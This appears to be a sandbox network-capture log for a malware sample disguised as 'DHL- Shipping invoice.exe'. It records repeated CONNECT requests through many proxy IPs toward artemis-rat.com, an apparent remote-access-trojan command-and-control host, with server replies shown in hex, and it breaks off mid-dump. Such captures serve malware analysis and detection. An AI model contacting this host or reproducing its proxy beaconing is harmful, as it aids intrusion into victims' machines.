                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.044516087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.301440954 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            89192.168.2.450203104.19.233.117806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.044750929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.131663084 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            90192.168.2.450204172.67.253.69806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.044833899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.132554054 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            91192.168.2.450210172.67.3.98806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.044835091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.133377075 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            92192.168.2.449777117.160.250.130806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.044914007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.265382051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.902328968 CET303INHTTP/1.1 400 Bad Request
                            Server: openresty
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 154
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            93192.168.2.450148184.72.36.89806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.045995951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.207884073 CET344INHTTP/1.1 403 Forbidden
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Server: Apache
                            Content-Length: 199
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            94192.168.2.450145162.241.207.217806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.046072960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.484133959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.999749899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.015436888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.069806099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.197701931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.250467062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.453290939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:19.640798092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            95192.168.2.4499724.144.161.159806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.046125889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            96192.168.2.45016074.48.7.43806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.046216011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            97192.168.2.450201104.16.105.106806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.048965931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.136713982 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            98192.168.2.450190172.67.181.32806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.049034119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.136703014 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            99192.168.2.450193104.18.220.95806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.049338102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.136647940 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            100192.168.2.450110154.236.179.22619766484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.061835051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.593486071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.249778032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.563215971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.250195026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.953805923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.750186920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.062891960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:25.562859058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            101192.168.2.449988114.29.212.145806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.063169003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            102192.168.2.45017918.169.83.8710806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.064548016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.497796059 CET65INHTTP/1.1 200 Connection Established
                            Content-Type: text/plain


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            103192.168.2.45033591.231.186.1334436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.065546989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            104192.168.2.449973148.72.209.174162036484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.069833994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.812237978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.874835014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.069725990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.453356028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.750129938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.082463026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            105192.168.2.4501645.252.23.22010816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.070316076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            106192.168.2.450007120.78.191.68806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.076858044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.410262108 CET767INHTTP/1.1 403 Forbidden
                            Server: Beaver
                            Cache-Control: no-cache
                            Content-Type: text/html
                            Content-Length: 635
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 